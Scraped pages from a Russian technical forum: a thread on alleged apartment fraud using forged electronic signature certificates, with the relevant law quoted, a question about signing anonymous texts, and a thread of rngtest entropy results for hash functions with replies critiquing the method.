    http://www.consultant.ru/document/cons_doc_LAW_112701/8431d1.../

    Статья 18. Выдача квалифицированного сертификата

    1. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр обязан:

    1) в порядке, установленном настоящим Федеральным законом, идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата. Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата либо посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации". При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения идентификации без личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы отказывается от использования шифровальных (криптографических) средств, указанных в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", удостоверяющий центр обязан отказать такому лицу в проведении указанной идентификации. Устанавливаются:

    а) в отношении физического лица - фамилия, имя, а также отчество (при наличии), дата рождения, реквизиты документа, удостоверяющего личность, идентификационный номер налогоплательщика, страховой номер индивидуального лицевого счета гражданина в системе обязательного пенсионного страхования;
    ....
    3) в установленном порядке идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата (в целях получения от заявителя, выступающего от имени юридического лица, подтверждения правомочия обращаться за получением квалифицированного сертификата). Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата, информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации";
    (п. 3 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
    4) предложить использовать шифровальные (криптографические) средства, указанные в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", физическим лицам, обратившимся к нему в целях проведения идентификации без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы (для предоставления биометрических персональных данных физического лица в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством сети "Интернет"), и указать страницу сайта в информационно-телекоммуникационной сети "Интернет", с которой безвозмездно предоставляются эти средства. При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством информационно-телекоммуникационной сети "Интернет" при выдаче сертификата ключа проверки электронной подписи отказывается от использования шифровальных (криптографических) средств, аккредитованный удостоверяющий центр обязан отказать такому лицу в проведении идентификации и выдаче сертификата ключа проверки электронной подписи.
    (п. 4 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
    1.1. Подтверждение достоверности сведений, перечисленных в пунктах 1 и 2 части 1 настоящей статьи, осуществляется одним из следующих способов:
    1) с использованием оригиналов документов и (или) надлежащим образом заверенных копий документов;
    2) с использованием единой системы межведомственного электронного взаимодействия, информационных систем органов государственной власти, Пенсионного фонда Российской Федерации, Федерального фонда обязательного медицинского страхования, единой информационной системы нотариата;
    3) с использованием единой системы идентификации и аутентификации.
    (часть 1.1 введена Федеральным законом от 27.12.2019 N 476-ФЗ)
    2. При обращении в аккредитованный удостоверяющий центр заявитель представляет следующие документы либо их надлежащим образом заверенные копии и (или) сведения из них:
    (в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
    (см. текст в предыдущей редакции)
    1) основной документ, удостоверяющий личность;
    2) страховой номер индивидуального лицевого счета заявителя - физического лица;
    (в ред. Федерального закона от 08.06.2020 N 181-ФЗ)
    (см. текст в предыдущей редакции)
    3) идентификационный номер налогоплательщика заявителя - физического лица;
    ...
    2.1. Заявитель вправе по собственной инициативе представить копии документов, содержащих сведения, указанные в пунктах 2 - 6 части 2 настоящей статьи.
    (часть 2.1 введена Федеральным законом от 30.12.2015 N 445-ФЗ; в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
    (см. текст в предыдущей редакции)
    ......
    5. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр направляет в единую систему идентификации и аутентификации сведения о лице, получившем квалифицированный сертификат, в объеме, необходимом для регистрации в единой системе идентификации и аутентификации, и о полученном им квалифицированном сертификате (уникальный номер квалифицированного сертификата, даты начала и окончания его действия, наименование выдавшего его аккредитованного удостоверяющего центра).

    сообщить модератору +/ответить
  • Про это уже неоднократно были разговоры и горячо обсуждали тему в СМИ Нужно лич, !*! simonflex (ok), 16:34 , 22-Дек-20 (23) +1
    > Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
    > и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
    > у меня взломали аккаунт на госуслугах.
    > У меня никогда не было ЭЦП и я даже не знаю, что
    > это такое. Паспорта со мной, я их не терял.
    > Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
    > миллион р).
    > У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
    > мошенники выпустили. Я отменю одну, а может, у них 10.
    > Что делать?

    Про это уже неоднократно были разговоры и горячо обсуждали тему в СМИ. Нужно лично зайти в МФЦ, вызвать управляющего и собственноручно написать заявление, о том что сделки с квартирой только с вашим личным присутствием. Управляющий заверит. И если не ошибаюсь, что-то предпринимали на этот счет. Тяжело, но в прокуратуру в полицию писать заявления.

    сообщить модератору +1 +/ответить
  • https ru m wikipedia org wiki Единая_система_идентификации_и_аутентификации b , !*! Аноним (49), 18:19 , 24-Дек-20 (49)
    https://ru.m.wikipedia.org/wiki/Единая_система_идентификации_и_аутентификации

    [b]* Для получения учётной записи ЕСИА необходимо удостоверить свою личность с помощью паспортных данных, ИНН и СНИЛС[/b]

    Эти все данные есть у работодателей, так как необходимы при устройстве на работу. (А сколько кто работ сменил)

    Надежное хранение этих документов требует огромных денег - наличие собственного дома с сейфом. (А сколько кто квартир съемных сменил, замки вы каждый раз в съёмной квартире меняли? в общежитиях с соседями сколько прожили? Сколько раз вам квартиру снимала трудоустраевающая организация и копия ключей хранилась у них? Сюда же надо добавить всех подруг с которыми вы совместно проживали................)

    Что там надо для их регистратуры? Паспорт, ИНН и СНИЛС? Можно копии! Можно без личного присутствия!!!

    [b]* облачное хранение приватного ключа пользователя[/b]

    Цензурные слова закончились.

    [b]* Существенно расширен набор данных, ведущихся в профиле пользователя (добавлены такие документы как заграничный паспорт, полис ОМС, военный билет и др., появилась возможность указывать сведения о детях). Предусмотрена возможность зарегистрировать учетную запись на номер мобильного телефона, который ранее был привязан к другой учетной записи.

    Майор одобрил. Вы подумали речь о нашем товарище? Нет, имел ввиду их..

    И все это на логина/пароле по HTTPS без ESNI конечно: https://www.linux.org.ru/forum/admin/15104732?cid=15164855

    И разрабов меняют каждый год: "AT Consulting, R-Style, «РТ лабс» и «Реак софт»"

    сообщить модератору +/ответить
  • Тут на лицо коррекционная составляющая кто то купил скан вашего паспорта в интер, !*! Руслан543 (?), 18:08 , 30-Янв-21 (67)
    > Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
    > и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
    > у меня взломали аккаунт на госуслугах.
    > У меня никогда не было ЭЦП и я даже не знаю, что
    > это такое. Паспорта со мной, я их не терял.
    > Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
    > миллион р).
    > У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
    > мошенники выпустили. Я отменю одну, а может, у них 10.
    > Что делать?

    Тут на лицо коррекционная составляющая кто то купил скан вашего паспорта в интернете
    и у него были знакомые в в удостоверяющем центре которые все и сделали пишите в сми нужно вызвать общественый резонанс


    сообщить модератору +/ответить
  • https www garant ru products ipo prime doc 400065686 Постановление Правительст, !*! Аноним (70), 14:56 , 20-Фев-21 (70)
    > неизвестно, сколько ЭЦП на моё имя мошенники выпустили

    https://www.garant.ru/products/ipo/prime/doc/400065686/
    Постановление Правительства РФ от 28 декабря 2020 г. № 2309 “Об утверждении требований к порядку предоставления владельцам квалифицированных сертификатов сведений о выданных им квалифицированных сертификатах с использованием единого портала государственных и муниципальных услуг”

    Требуют регистрироваться на "госуслугах" и кроме Ф.И.О. предоставить СНИЛС.

    Сертификаты ЭП, выданные аккредитованными УЦ: https://e-trust.gosuslugi.ru/#/portal/registry/certificate-list
    Сертификаты, переданные АУЦ в связи с прекращением своей деятельности: https://e-trust.gosuslugi.ru/#/portal/registry/passed-certif...
    Отсутствие поиска по Ф.И.О. делает данный сервис почти бесполезным.

    Как по мне это нарушает дух и букву Закона:
    ст. 15 п. 3 http://www.consultant.ru/document/cons_doc_LAW_112701/03690e...
    «3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети «Интернет», к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.»

    Налоговая, к примеру, предоставляет доступ к реестру ЕГРЮЛ без ограничений: https://egrul.nalog.ru/ с возможностью поиска по Ф.И.О., ИНН...

    сообщить модератору +/ответить
  • И чем закончилась история а то даже не по себе , !*! aydanasadykova1995 (ok), 17:31 , 28-Дек-22 (72)
    > Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
    > и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
    > у меня взломали аккаунт на госуслугах.
    > У меня никогда не было ЭЦП и я даже не знаю, что
    > это такое. Паспорта со мной, я их не терял.
    > Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
    > миллион р).
    > У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
    > мошенники выпустили. Я отменю одну, а может, у них 10.
    > Что делать?

    И чем закончилась история? а то даже не по себе((

    сообщить модератору +/ответить
  • Дыра таки есть, и в инетах шумок не стихает https tass ru ekonomika 21582911ht, !*! Аноним (79), 12:05 , 12-Авг-24 (79)
    Дыра таки есть, и в инетах шумок не стихает:

    https://tass.ru/ekonomika/21582911

    https://tass.ru/ekonomika/21393391

    https://www.opennet.me/openforum/vsluhforumID10/5567.html

    "В Минцифры подчеркнули, что на портале можно только подать заявление в Росреестр на регистрацию права собственности, которое подписывается в приложении "Госключ". Решение же о регистрации недвижимoсти принимает Росреестр после тщательной проверки оснований, указали в министерстве."

    Росреестр автоматически проверяет правельность заполнения заявок и реквизиты указанных документов... Считаю дыру оставили умышленно!

    сообщить модератору +/ответить


Выбор площадки для анонимной публикации, !*! cc1551d332ce, (Разное) 30-Авг-22, 06:01  [ | | | ] [линейный вид] [смотреть все]
- Где (на какой онлайн площадке) опубликовать анонимно текст (тема: философия; язык: русский), чтобы пользователи имели возможно его обсуждать через комментарии?

- И как надежно подписать текст, чтобы при необходимости можно было доказать его авторство ? (типа цифровая подпись на анонима)
// полагаю как вариант сделать новую GPG, без указания email.

Статистическое исследование энтропии из контрольных сум., !*! Аноним, (ПО для тестирования и диагностики) 11-Мрт-23, 11:51  [ | | | ] [линейный вид] [смотреть все]
Статистическое исследование энтропии тестом  FIPS 140-2 от 2001-10-10, rngtest из пакета rng-tools.

Как говорят ложь делится на три категории: 1 ложь, 2 циничная ложь, 3 статистика.
По этому, чтобы никого не обмануть, где статистических данных было мало для точного определения цифры, поставил знак: "?".

Первая колонка - источник энтропии. Вторая колонка - качество энтропии, количество девяток определено всегда точно. Третья колонка - скорость.
Ниже приведены результаты теста.

Вопрос: Если допустить, что мир идет от худшего к лудшему, почему тогда качество энтропии полученой от SHA3 хуже чем от SHA2, а качество энтропии полученой от SHA2 хуже чем от SHA1?


/dev/urandom | rngtest        99.99?%        10.3 MB/s
rngtest: FIPS 140-2 successes: 999932
rngtest: FIPS 140-2 failures: 68
rngtest: FIPS 140-2(2001-10-10) Monobit: 11
rngtest: FIPS 140-2(2001-10-10) Poker: 32
rngtest: FIPS 140-2(2001-10-10) Runs: 25
rngtest: FIPS 140-2(2001-10-10) Long run: 0
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


/dev/urandom            99.92%        72.9 MB/s
rngtest: FIPS 140-2 successes: 999230
rngtest: FIPS 140-2 failures: 770
rngtest: FIPS 140-2(2001-10-10) Monobit: 103
rngtest: FIPS 140-2(2001-10-10) Poker: 90
rngtest: FIPS 140-2(2001-10-10) Runs: 293
rngtest: FIPS 140-2(2001-10-10) Long run: 288
rngtest: FIPS 140-2(2001-10-10) Continuous run: 1


openssl rand (/dev/urandom)    99.9?%        72.9 MB/S
rngtest: FIPS 140-2 successes: 99921
rngtest: FIPS 140-2 failures: 79
rngtest: FIPS 140-2(2001-10-10) Monobit: 17
rngtest: FIPS 140-2(2001-10-10) Poker: 10
rngtest: FIPS 140-2(2001-10-10) Runs: 30
rngtest: FIPS 140-2(2001-10-10) Long run: 23
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gpg --gen-random 0        99.9?%        4.2 MB/s
rngtest: FIPS 140-2 successes: 99927
rngtest: FIPS 140-2 failures: 73
rngtest: FIPS 140-2(2001-10-10) Monobit: 8
rngtest: FIPS 140-2(2001-10-10) Poker: 5
rngtest: FIPS 140-2(2001-10-10) Runs: 28
rngtest: FIPS 140-2(2001-10-10) Long run: 33
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gpg --gen-random 1        99.9?%        2.7 MB/s
rngtest: FIPS 140-2 successes: 99919
rngtest: FIPS 140-2 failures: 81
rngtest: FIPS 140-2(2001-10-10) Monobit: 12
rngtest: FIPS 140-2(2001-10-10) Poker: 9
rngtest: FIPS 140-2(2001-10-10) Runs: 27
rngtest: FIPS 140-2(2001-10-10) Long run: 34
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gpg --gen-random 2        99.9?%        5.2 kB/s
rngtest: FIPS 140-2 successes: 99947
rngtest: FIPS 140-2 failures: 53
rngtest: FIPS 140-2(2001-10-10) Monobit: 7
rngtest: FIPS 140-2(2001-10-10) Poker: 8
rngtest: FIPS 140-2(2001-10-10) Runs: 18
rngtest: FIPS 140-2(2001-10-10) Long run: 21
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


/dev/random + haveged        99.?%        84.8 kB/s    !!!!!!!!!!!!!!!
rngtest: FIPS 140-2 successes: 9900
rngtest: FIPS 140-2 failures: 100
rngtest: FIPS 140-2(2001-10-10) Monobit: 6
rngtest: FIPS 140-2(2001-10-10) Poker: 21
rngtest: FIPS 140-2(2001-10-10) Runs: 13
rngtest: FIPS 140-2(2001-10-10) Long run: 62
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


aich                99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


btih                99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


crc32                99.9?%
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

ed2k                99.9?%
rngtest: FIPS 140-2 successes: 9988
rngtest: FIPS 140-2 failures: 12
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


edon-r256            99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


edon-r512            99.9?%
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gost                99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gost-cryptopro (md_gost94)    99.9?%
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


has160                99.9?%
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


md4                99.9?%
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


md5                99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 0
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


ripemd160            99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha1                99.9?%
rngtest: FIPS 140-2 successes: 9997
rngtest: FIPS 140-2 failures: 3
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha224                99.9?%
rngtest: FIPS 140-2 successes: 9996
rngtest: FIPS 140-2 failures: 4
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha256                99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha384                99.9?%
rngtest: FIPS 140-2 successes: 9988
rngtest: FIPS 140-2 failures: 12
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha512                99.9?%
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-224            99.9?%
rngtest: FIPS 140-2 successes: 9987
rngtest: FIPS 140-2 failures: 13
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 8
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-256            99.9?%
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-384            99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 3
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-512            99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sm3                99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


snefru128            99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 5
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


snefru256            99.?%                !!!!!!!!!!!!!!!
rngtest: FIPS 140-2 successes: 9984
rngtest: FIPS 140-2 failures: 16
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 6
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


streebog256            99.9?%
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 7
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


streebog512            99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


tiger                99.9?%
rngtest: FIPS 140-2 successes: 9997
rngtest: FIPS 140-2 failures: 3
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


tth                99.?%                !!!!!!!!!!!!!!!
rngtest: FIPS 140-2 successes: 9980
rngtest: FIPS 140-2 failures: 20
rngtest: FIPS 140-2(2001-10-10) Monobit: 4
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 10
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


whirlpool            99.9?%
rngtest: FIPS 140-2 successes: 9995
rngtest: FIPS 140-2 failures: 5
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


  • Хэширование вообще-то энтропию не создает Часто даже уменьшает , !*! Аноним (1), 13:28 , 12-Мрт-23 (1) +1
    >Статистическое исследование
    >не описана методика
    >Первая колонка - источник энтропии
    >названия алгоритмов хэширования

    Хэширование вообще-то энтропию не создает. Часто даже уменьшает.

    сообщить модератору +1 +/ответить
  • Для хеш-сумм главное коллизии Энтропия, конечно, тоже важна, но измерять её инс, !*! Аноним (9), 22:21 , 13-Мрт-23 (4)
    Для хеш-сумм главное коллизии. Энтропия, конечно, тоже важна, но измерять её инструментом для анализа генераторов случайных чисел - некорректно.

    И даже так - ваш эксперимент показывает, что энтропия хеш-сумм заметно ниже чем у рандома. А разница между хэш-суммами незначительна и не влияет на их предназначение (плюс не забываем про некорректность инструмента измерения). ИМХО это успех.

    сообщить модератору +/ответить
  • Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник,, !*! ыы (?), 08:32 , 15-Мрт-23 (11)
    > Статистическое исследование энтропии тестом  FIPS 140-2 от 2001-10-10, rngtest из пакета
    > rng-tools.
    > Как говорят ложь

    Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник, который зависит от вашей активности за компом...

    SHA1 не берет данные из воздуха... он берет их все из того же источника что и все остальные.
    "RNG генерит случайные числа  на основе данных из пула энтропии(entropy pool) в ядре Linux. Наполнением этого пула так же занимается RNG и делается это на основе случайных событий в системе таких как: тайминги клавиатуры и дисков, движения мыши, прерывания(interrupts), сетевой трафик.
    "
    Поэтому ваш эксперимент нужно проводить не единоразово, а прогонять один и тот же тест по кругу в течении недели...и усреднить значения.

    сообщить модератору +/ответить
  • Статистическое исследование зависимости энтропии из контрольных сум от входных д, !*! Аноним (17), 18:07 , 10-Апр-23 (17)
    Статистическое исследование зависимости энтропии из контрольных сум от входных данных.

    Первый тест в этой теме получен из входных данных следующего типа:


    original (Pseudo entropy file: "ASCII text, with very long lines" ~75K)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=150 status=none

    Контрольные сумы с подозрительными результатами sha1, sha224, sha384 и tiger перепроверил с разными входящими данными.
    В статистическом исследовании проводилось всего 10 000 тестов, чего явно недостаточно чтобы дать точную цифру после трёх девяток!
    Отмечаем, что sha384 победил со следующими входными данными:
    1. date +%-N%s
    2. date +%-N%s |b2sum |sed 's/[ -]//g'
    4. dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
    5. dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none
    И опять проиграл в тесте с входными данными:
    3. dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none
    в котором sha1 и tiger опять удержали два первых места, причём tiger подтвердил лучший результат.

    То что сума ошибок в тестах больше "failures" означает что ошибки случились в одном и томже тестируемом блоке.
    Такие результаты tiger в 4 тесте возможно из-за временной большой нагрузки на комп, load average: ~20

    1.


    date +%-N%s

    sha1
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
